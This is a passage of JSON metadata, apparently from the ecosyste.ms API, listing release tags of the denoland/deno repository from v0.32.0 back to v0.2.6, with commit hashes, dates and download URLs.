denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden